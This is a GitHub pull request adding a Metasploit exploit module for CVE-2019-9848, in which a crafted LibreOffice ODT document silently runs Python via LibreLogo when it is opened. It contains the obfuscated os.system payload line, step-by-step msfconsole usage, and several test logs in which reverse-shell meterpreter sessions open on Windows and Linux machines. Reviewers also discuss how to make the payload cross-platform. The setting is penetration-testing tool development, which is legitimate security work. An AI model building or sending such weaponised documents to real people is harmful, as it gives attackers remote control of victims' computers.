Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9848) #12147

Closed
wants to merge 13 commits into from

Conversation

@LoadLow
Copy link
Contributor

commented Jul 30, 2019

It seems to also work on 6.2.5 (should be tested again) and doesn't require any user interaction after opening the odt file with a vulnerable LibreOffice (in comparison to the original PoC).

Original PoC from Nils Emmerich

Description

This module exploits CVE-2019-9848 and is based on the module exploiting CVE-2018-16858, written by Shelby Pace.

LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands.

By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning.

This module generates an ODT file with a dom loaded event that, when triggered, will execute any arbitrary python code and the metasploit payload. LibreLogo executes the python code stored on the text part of the document.

The generated document file contains a one-liner python code that calls os.system:

getattr(__import__("os"),"system")("<%= @cmd %>")

but with smart quotes “os”(because this interpreter accepts it and why not?) and encoded :

<text:p text:style-name="P8">&#x67;&#x65;&#x74;&#x61;&#x74;&#x74;&#x72;(&#x5f;&#x5f;&#x69;&#x6d;&#x70;&#x6f;&#x72;&#x74;&#x5f;&#x5f;(&#x201C;\x6f\&#x78;73&#x201D;),&#x201C;\&#x78;73\&#x78;79\&#x78;73\&#x78;74\x65\&#x78;6d&#x201D;)(“<%= @cmd %>”)</text:p>

To avoid any python error, the h1 title written in the document is a python comment #.

Vulnerable Application

LibreOffice version 6.2.5 and prior.

This module has been tested successfully with:

  • LibreOffice 6.2.4 on Windows 7
  • LibreOffice 6.2.5 on Windows 7
  • LibreOffice 6.2.4 on Debian 9.9

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/fileformat/libreoffice_logo_exec
  4. Do: set LHOST <ip>
  5. Do: set LPORT <port>
  6. Do: run
  7. Move the generated file to the target
  8. Start a handler
  9. Open the file with a vulnerable version of LibreOffice
  10. You should get a shell.

Scenarios

LibreOffice 6.2.4 on Windows 7

msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Sending stage (179779 bytes) to 192.168.33.102
[*] Meterpreter session 3 opened (192.168.33.1:4444 -> 192.168.33.102:46327) at 2019-07-29 03:33:03 -0400

meterpreter > 

LibreOffice 6.2.4 on Debian 9.9

msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[+] librefile.odt stored at /home/foobar/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.33.1
lhost => 192.168.33.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Sending stage (985320 bytes) to 192.168.33.117
[*] Meterpreter session 5 opened (192.168.33.1:4444 -> 192.168.33.117:43602) at 2019-07-29 04:44:04 -0400

meterpreter > getuid
Server username: uid=1001, gid=1001, euid=1001, egid=1001
meterpreter > 

LoadLow added some commits Jul 30, 2019

Adds exploit module for CVE-2019-9848
uses on dom-loaded event (triggered just after opening the document) and still working on 6.2.5

@LoadLow LoadLow changed the title Adds LibreOffice LibreLogo exec exploit Module (CVE-2019-9848) Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9848) Jul 30, 2019

LoadLow added some commits Jul 30, 2019

@busterb busterb added the module label Jul 30, 2019

@space-r7 space-r7 added the docs label Jul 31, 2019

@cbrnrd
Copy link
Contributor

left a comment

Awesome work! Just a few stylistic things to clean up, but looks good otherwise :)

LoadLow and others added some commits Aug 3, 2019

Update libreoffice_logo_exec documentation
Co-Authored-By: bcoles <bcoles@gmail.com>
Update libreoffice_logo_exec documentation
Co-Authored-By: Carter Brainerd <0xCB@protonmail.com>
Removes double quotes in libreoffice_logo_exec
Co-Authored-By: Carter Brainerd <0xCB@protonmail.com>
Update libreoffice_logo_exec documentation
Co-Authored-By: bcoles <bcoles@gmail.com>
Update libreoffice_logo_exec documentation
Co-Authored-By: bcoles <bcoles@gmail.com>
@bcoles

This comment has been minimized.

Copy link
Contributor

commented Aug 3, 2019

Is there a reason to use ARCH_CMD payloads rather than ARCH_PYTHON ?

I ask, because this is a file format exploit, and there's no guarantee the user will open the document on the correct platform. Comparatively, if you're already executing native Python code, you could use a Python payload, which should effectively be universal, and execute regardless of the target platform.

@LoadLow

This comment has been minimized.

Copy link
Contributor Author

commented Aug 3, 2019

I have first tried it, but it was not working properly.
Maybe, it was related to some characters handled differently and because each line of Python must be in its <text:p> block.

@bcoles

This comment has been minimized.

Copy link
Contributor

commented Aug 3, 2019

each line of Python must be in its <text:p> block.

Perhaps it could be wrapped in an eval() call ? Maybe whoever reviews this PR can take a look during the review process.

@LoadLow

This comment has been minimized.

Copy link
Contributor Author

commented Aug 3, 2019

I was trying with an eval payload but without any success, but yes it could be interesting to target all the platforms with only one document.

@bcoles

This comment has been minimized.

Copy link
Contributor

commented Aug 3, 2019

FWIW, I tested this on Linux Mint 19.

Initial exploitation failed, as the Libre Logo package was not installed by default.

image

image

However, upon installation, the exploit worked as described:

msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set disablepayloadhandler false
disablepayloadhandler => false
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.
[+] librefile.odt stored at /root/.msf4/local/librefile.odt
[*] Sending stage (3021284 bytes) to 172.16.191.211

[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.211:43966) at 2019-08-03 00:58:31 -0400

meterpreter > 
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > 
@space-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 13, 2019

Tested v6.2.4 on Ubuntu:

msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set target 1
target => 1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[*] File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.
[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (985320 bytes) to 192.168.37.137
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.137:42962) at 2019-08-13 12:50:27 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : 192.168.37.137
OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

Tested v6.2.5 on Windows 10:

msf5 > use exploit/multi/fileformat/libreoffice_logo_exec 
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > run

[*] File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.
[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
msf5 exploit(multi/fileformat/libreoffice_logo_exec) > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (179779 bytes) to 192.168.37.147
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.147:50192) at 2019-08-13 13:12:59 -0500

meterpreter > getuid
Server username: DESKTOP-L5FDSM7\Shelby Pace
meterpreter > sysinfo
Computer        : DESKTOP-L5FDSM7
OS              : Windows 10 (Build 16299).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
@space-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 13, 2019

Hi @LoadLow, I just noticed that you're working off of your master branch. Before I can land your module, could you create a new PR that is based off of a unique branch instead?

This helps protect the process, ensures users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes, and allows contributors to make progress while a PR is still being reviewed.

I'll go ahead and close this PR, and I'll be looking out for the new PR. Apologies for not catching this sooner. Thank you!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
5 participants
You can’t perform that action at this time.